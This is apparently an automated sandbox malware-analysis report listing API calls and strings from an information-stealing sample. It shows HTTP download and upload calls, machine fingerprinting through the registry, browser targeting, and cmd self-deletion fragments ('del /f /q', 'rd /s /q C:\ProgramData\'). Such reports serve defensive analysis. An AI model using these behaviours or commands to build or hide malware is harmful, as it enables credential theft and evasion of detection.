                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F44E0
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002F44EF
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 002F450E
                                      • InternetReadFile.WININET(00000000,?,00000400,00000001), ref: 002F4566
                                      • InternetCloseHandle.WININET(00000000), ref: 002F4597
                                      • InternetCloseHandle.WININET(00000000), ref: 002F45A4
                                      • InternetCloseHandle.WININET(00000000), ref: 002F45AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                      • String ID: GET
                                      • API String ID: 442264750-1805413626
                                      • Opcode ID: e61985f693ba435fd8e9d5e200cec6940f385f7077ed77c461adddd3ab94b392
                                      • Instruction ID: 1b7e4686df58025699884ef73405ecdb1c4eb4b7d9846a41a315df7359032c49
                                      • Opcode Fuzzy Hash: e61985f693ba435fd8e9d5e200cec6940f385f7077ed77c461adddd3ab94b392
                                      • Instruction Fuzzy Hash: AC517671A1021DABEB20EFA4DD55FBFB7B8EF58740F404128FB05A7281D7709A158BA0

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 002FF8A0: lstrlen.KERNEL32(002F5B05,00000000,?,?,002F5B05,003101E9), ref: 002FF8AB
                                        • Part of subcall function 002FF8A0: lstrcpy.KERNEL32(00000000,002F5B05), ref: 002FF8E2
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00303B47
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00303BAA
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00303CF3
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 00302EE0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00302F20
                                        • Part of subcall function 00302FA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00302FFA
                                        • Part of subcall function 00302FA0: lstrlen.KERNEL32(00000000), ref: 00303011
                                        • Part of subcall function 00302FA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00303039
                                        • Part of subcall function 00302FA0: lstrlen.KERNEL32(00000000), ref: 0030304E
                                        • Part of subcall function 00302FA0: lstrlen.KERNEL32(00000000), ref: 0030306B
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00303C90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00303DD9
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00303E3C
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00303F22
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00303F85
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0030406B
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003040C8
                                      • Sleep.KERNEL32(0000EA60), ref: 003040D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: ERROR
                                      • API String ID: 507064821-2861137601
                                      • Opcode ID: 14292f27e43b744dbb791f7b11404459265273f9ffd64b868d817a189ca49996
                                      • Instruction ID: 61fca1fc747113b01ab53e49c9594cab10458315fce5431ba07c365c554710e3
                                      • Opcode Fuzzy Hash: 14292f27e43b744dbb791f7b11404459265273f9ffd64b868d817a189ca49996
                                      • Instruction Fuzzy Hash: C5221C7582020CAADB54FB70DD569FEB73C6F143C0F804578FA0662196EF35AB688E61
                                      APIs
                                      • memset.MSVCRT ref: 00303249
                                      • memset.MSVCRT ref: 00303255
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0030326A
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 003033B5
                                      • memset.MSVCRT ref: 003033C2
                                      • memset.MSVCRT ref: 003033D4
                                      • ExitProcess.KERNEL32 ref: 003033E5
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpymemset$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                      • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                      • API String ID: 1134881415-1686486140
                                      • Opcode ID: 41afacafe2a94d042948d268c31d11751adad45ea8ac941f58cedb54d51df49f
                                      • Instruction ID: 784932082eebeaa597e84b468cb884d69002d306bcc6178f159ff7913fbd3afb
                                      • Opcode Fuzzy Hash: 41afacafe2a94d042948d268c31d11751adad45ea8ac941f58cedb54d51df49f
                                      • Instruction Fuzzy Hash: BD510B71C2020CAACB55EBA0DD92DFEB738AF14780F508279F21672191EB706759CF94
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF8A0: lstrlen.KERNEL32(002F5B05,00000000,?,?,002F5B05,003101E9), ref: 002FF8AB
                                        • Part of subcall function 002FF8A0: lstrcpy.KERNEL32(00000000,002F5B05), ref: 002FF8E2
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 00301400: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00301439
                                        • Part of subcall function 00301400: Process32First.KERNEL32(00000000,00000128), ref: 00301449
                                        • Part of subcall function 00301400: Process32Next.KERNEL32(00000000,00000128), ref: 0030145B
                                        • Part of subcall function 00301400: StrCmpCA.SHLWAPI(?,?), ref: 00301470
                                        • Part of subcall function 00301400: CloseHandle.KERNEL32(00000000), ref: 00301482
                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,02F45090,00000000,?,003101E9,00000000), ref: 00306A16
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00306B22
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00306B3C
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 00300420: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0030043C
                                        • Part of subcall function 00300420: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00300475
                                        • Part of subcall function 00300420: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003004BF
                                        • Part of subcall function 00300420: RtlAllocateHeap.NTDLL(00000000), ref: 003004C6
                                        • Part of subcall function 002F3E20: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F3EAC
                                        • Part of subcall function 002F3E20: StrCmpCA.SHLWAPI(?,02F43058), ref: 002F3EC7
                                        • Part of subcall function 003023F0: StrCmpCA.SHLWAPI(00000000,block), ref: 0030240D
                                        • Part of subcall function 003023F0: ExitProcess.KERNEL32 ref: 00302418
                                        • Part of subcall function 002FE870: StrCmpCA.SHLWAPI(00000000,02F43328), ref: 002FE8C0
                                        • Part of subcall function 002FE870: StrCmpCA.SHLWAPI(00000000,02F43338), ref: 002FE947
                                        • Part of subcall function 002F5BB0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F5C3C
                                        • Part of subcall function 002F5BB0: StrCmpCA.SHLWAPI(?,02F43058), ref: 002F5C57
                                        • Part of subcall function 00301F00: strtok_s.MSVCRT ref: 00301F24
                                      • Sleep.KERNEL32(000003E8), ref: 00306F45
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,02F45420), ref: 00305D5B
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,00000000), ref: 00305D7E
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,?), ref: 00305D9A
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,?), ref: 00305DAE
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,02F389E0), ref: 00305DC1
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,?), ref: 00305DD5
                                        • Part of subcall function 00305D00: lstrcat.KERNEL32(?,02F45900), ref: 00305DE9
                                        • Part of subcall function 002F45D0: lstrlen.KERNEL32(00000000), ref: 002F4641
                                        • Part of subcall function 002F45D0: StrCmpCA.SHLWAPI(?,02F43058,003101E9,003101E9,003101E9,003101E9), ref: 002F46A6
                                        • Part of subcall function 002F45D0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F46CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$InternetOpenlstrcpy$lstrlen$CreateDirectoryHeapProcessProcess32$AllocateCloseExitFirstHandleInformationNextSleepSnapshotToolhelp32VolumeWindowsstrtok_s
                                      • String ID: .exe$_DEBUG.zip$arp$dabl$http://$org$zapto
                                      • API String ID: 1508513256-1018522893
                                      • Opcode ID: d8e5fc7bd8b07a0d85b9583b4f6b1104393b562dc52c32e61e0f1d44f668e690
                                      • Instruction ID: ffb1fba41777ebdb860650578df4d8a17c68084f775e7e44db0c308512b6f259
                                      • Opcode Fuzzy Hash: d8e5fc7bd8b07a0d85b9583b4f6b1104393b562dc52c32e61e0f1d44f668e690
                                      • Instruction Fuzzy Hash: 67A26171D2020CAACB59FBA0DD62DFDF778AF54780F404178E60662291EF306B59CEA5
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,02F43328), ref: 002FE8C0
                                      • StrCmpCA.SHLWAPI(00000000,02F43338), ref: 002FE947
                                      • StrCmpCA.SHLWAPI(00000000,firefox), ref: 002FECBD
                                      • StrCmpCA.SHLWAPI(00000000,02F43378), ref: 002FEA4C
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                      • StrCmpCA.SHLWAPI(00000000,02F43328), ref: 002FEB30
                                      • StrCmpCA.SHLWAPI(00000000,02F43338), ref: 002FEBB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy
                                      • String ID: Stable\$firefox
                                      • API String ID: 3722407311-3160656979
                                      • Opcode ID: cfa1e1f25d0904b37ba279d90bf688b813adc01a0004ba88862e295c2527eff2
                                      • Instruction ID: 57271a3d6d385cc0fd3f4a0b3830d636b52f7f66977cee28615a0528dda60b26
                                      • Opcode Fuzzy Hash: cfa1e1f25d0904b37ba279d90bf688b813adc01a0004ba88862e295c2527eff2
                                      • Instruction Fuzzy Hash: FCE13371A102089FCB68EF64D956EEDB7B9BF44390F408539ED099B391DB309A18CF91
                                      APIs
                                      • memset.MSVCRT ref: 00300365
                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 00300382
                                      • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,00000000,000000FF), ref: 003003A4
                                      • RegCloseKey.ADVAPI32(?), ref: 003003AE
                                      • CharToOemA.USER32(00000000,?), ref: 003003C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CharCloseOpenQueryValuememset
                                      • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                      • API String ID: 2391366103-1211650757
                                      • Opcode ID: 26f8884b7aa3b977639a4551fc57c482a7712533724c4839cb31a1214305fedc
                                      • Instruction ID: 5d926ac6de816c91d803bc5d66e58ab4f529eb5b0e0fb0f4523521dcceec7497
                                      • Opcode Fuzzy Hash: 26f8884b7aa3b977639a4551fc57c482a7712533724c4839cb31a1214305fedc
                                      • Instruction Fuzzy Hash: B001717994020DBBDB64DB90DC4AFDAB778EB54700F1002D8F648A60C1DBB06BC98B50
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F5010: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F5062
                                        • Part of subcall function 002F5010: StrCmpCA.SHLWAPI(?,02F43058), ref: 002F507A
                                        • Part of subcall function 002F5010: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F50A2
                                        • Part of subcall function 002F5010: HttpOpenRequestA.WININET(00000000,GET,?,02F45FE0,00000000,00000000,-00400100,00000000), ref: 002F50DC
                                        • Part of subcall function 002F5010: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F5100
                                        • Part of subcall function 002F5010: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002F510F
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00302FFA
                                      • lstrlen.KERNEL32(00000000), ref: 00303011
                                        • Part of subcall function 00300DA0: LocalAlloc.KERNEL32(00000040,002F87D9,?,?,?,?,002F87D8,00000000,00000000), ref: 00300DBC
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00303039
                                      • lstrlen.KERNEL32(00000000), ref: 0030304E
                                      • lstrlen.KERNEL32(00000000), ref: 0030306B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR
                                      • API String ID: 3240024479-2861137601
                                      • Opcode ID: ef989e1c41e99feccc16750c1d0e64ce52a2d1d86499e7f8d356369adb491a7e
                                      • Instruction ID: dd3940e1812ffb39c91284d8055b74b6dae78d8a42329a8cd1bffca5c4e774b1
                                      • Opcode Fuzzy Hash: ef989e1c41e99feccc16750c1d0e64ce52a2d1d86499e7f8d356369adb491a7e
                                      • Instruction Fuzzy Hash: F33185719211086BDBA5FB70DD669FDB76CAE147C0F444134FE0667292DF30AB24CA90
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                      • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: d76b5c98eb0933722b3588c4004747288f71b01ab2ecfde8a5741a9f58a1a09b
                                      • Instruction ID: ad3c5e675d1d9b62828ed62c04983d12d1d8ec1376b7a81425e38ad1582426bd
                                      • Opcode Fuzzy Hash: d76b5c98eb0933722b3588c4004747288f71b01ab2ecfde8a5741a9f58a1a09b
                                      • Instruction Fuzzy Hash: 33117C71D0020CABDB00EFA4E845BEDB7A8EF44310F04523AFA15AB390EF3199058B94
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003005B5
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 003005BC
                                        • Part of subcall function 002FFA60: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFA75
                                        • Part of subcall function 002FFA60: RtlAllocateHeap.NTDLL(00000000), ref: 002FFA7C
                                        • Part of subcall function 002FFA60: RegOpenKeyExA.KERNEL32(80000002,02F35198,00000000,00020119,?), ref: 002FFA9B
                                        • Part of subcall function 002FFA60: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 002FFAB5
                                        • Part of subcall function 002FFA60: RegCloseKey.ADVAPI32(?), ref: 002FFABF
                                      • RegOpenKeyExA.KERNEL32(80000002,02F35198,00000000,00020119,?), ref: 003005F1
                                      • RegQueryValueExA.KERNEL32(?,02F45180,00000000,00000000,00000000,000000FF), ref: 0030060C
                                      • RegCloseKey.ADVAPI32(?), ref: 00300616
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: d3941c1b912d1e98667ee15f95c4fe5456f578892dff25ade7b1b3c2355a4b24
                                      • Instruction ID: c65bbfdb386a43de0b3b92a4d08e95b2f6292ad38e07092792d07c7612e96d36
                                      • Opcode Fuzzy Hash: d3941c1b912d1e98667ee15f95c4fe5456f578892dff25ade7b1b3c2355a4b24
                                      • Instruction Fuzzy Hash: 8B01267460120CBBE724DBA4EC09FBA777CEF44301F004159FA08D3280D6709959ABA0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFA75
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FFA7C
                                      • RegOpenKeyExA.KERNEL32(80000002,02F35198,00000000,00020119,?), ref: 002FFA9B
                                      • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 002FFAB5
                                      • RegCloseKey.ADVAPI32(?), ref: 002FFABF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: 5c8cebccadf9a3e91b3b1b63b6071b65486b1760d0bd1739f226154e8ac14bcb
                                      • Instruction ID: febf2bd5d00a8ba5ef5514355a7bc04ea3ec8689022c7ead77e2aea273db9024
                                      • Opcode Fuzzy Hash: 5c8cebccadf9a3e91b3b1b63b6071b65486b1760d0bd1739f226154e8ac14bcb
                                      • Instruction Fuzzy Hash: 0EF0C2B5541308BBE724ABE0AC0AFFB7B7CEF59711F040154FA05A6180D7705A4897A1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFEDE
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FFEE5
                                      • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 002FFF05
                                      • wsprintfA.USER32 ref: 002FFF2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2922868504-3474575989
                                      • Opcode ID: 6e4445b4f29e9a3022ed7898c933b6bce3305b20c3e2b4e93f515c60fa75f960
                                      • Instruction ID: 2aadbbdfe7b8c8ca6e8d1976dbe0cef25def02bedcd4d582d0d5087fd63eb91b
                                      • Opcode Fuzzy Hash: 6e4445b4f29e9a3022ed7898c933b6bce3305b20c3e2b4e93f515c60fa75f960
                                      • Instruction Fuzzy Hash: 42F062B1A5021CABE714ABA8DC0AFBE77ACEF05344F400128F706E61C0D7649C0587A5
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                      • GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                      • LocalFree.KERNEL32(?,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CA9
                                      • CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: d7ac34a9519c731048d85712a3bd389299e89ce12381a3da2bd62c0e7972e708
                                      • Instruction ID: 6c87416fd43da8408b59be7c4dad4e28844d6a2a7e8db31d249edf31f219a9fc
                                      • Opcode Fuzzy Hash: d7ac34a9519c731048d85712a3bd389299e89ce12381a3da2bd62c0e7972e708
                                      • Instruction Fuzzy Hash: C611A27121010AAFEB20DF64DC9CEBAB77DEF91780F104139FA8197290DB30AD569B60
                                      APIs
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F404B8), ref: 00307748
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F402C0), ref: 00307761
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F402D8), ref: 00307779
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F403E0), ref: 00307791
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F3B368), ref: 003077AA
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F39F50), ref: 003077C2
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F3A0B0), ref: 003077DA
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F404D0), ref: 003077F3
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F40500), ref: 0030780B
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F40578), ref: 00307823
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F40410), ref: 0030783C
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F3A110), ref: 00307854
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FFAE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFAEC
                                        • Part of subcall function 002FFAE0: RtlAllocateHeap.NTDLL(00000000), ref: 002FFAF3
                                        • Part of subcall function 002FFAE0: GetUserNameA.ADVAPI32(00000000,?), ref: 002FFB07
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02F3B2F8,?,00313414,?,00000000,003101E9), ref: 00307672
                                      • CloseHandle.KERNEL32(00000000), ref: 00307681
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00307697
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003076B1
                                      • CloseHandle.KERNEL32(00000000), ref: 003076BF
                                      • ExitProcess.KERNEL32 ref: 003076C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
